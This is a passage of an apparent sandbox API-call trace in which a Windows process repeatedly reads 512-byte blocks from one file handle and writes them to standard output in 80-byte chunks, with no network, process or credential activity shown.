lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType 
(hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.857] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.857] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, 
lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, 
lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.858] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.858] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, 
lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.859] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.859] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 
[0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.860] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.860] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, 
lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: 
lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.861] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.861] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.862] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.862] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] 
GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 
[0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.863] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.863] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, 
